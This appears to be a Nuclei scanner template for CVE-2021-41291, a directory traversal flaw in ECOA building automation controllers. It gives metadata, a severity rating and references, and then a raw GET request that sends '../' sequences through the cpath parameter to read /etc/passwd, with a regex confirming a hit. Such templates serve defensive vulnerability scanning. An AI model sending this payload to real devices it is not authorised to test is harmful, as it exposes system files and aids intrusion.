id: CVE-2021-41291

info:
  name: ECOA Building Automation System - Directory Traversal Content Disclosure
  author: gy741
  severity: high
  description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41291
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
    - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
    - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41291
    cwe-id: CWE-22
    epss-score: 0.0476
    epss-percentile: 0.91801
    cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ecoa
    product: ecs_router_controller-ecs_firmware
  tags: cve,cve2021,ecoa,lfi,traversal

http:
  - raw:
      - |
        GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4a0a0047304502200f6b5375c830f12ae6bbd7d3fcce26be6695d5d7f3b7d8e19a2f31c54d31e14a022100f1e37016baddc04385fb1b00e937d26c4ead41d921816cf8153a573f1e6e6968:922c64590222798bb761d5b6d8e72950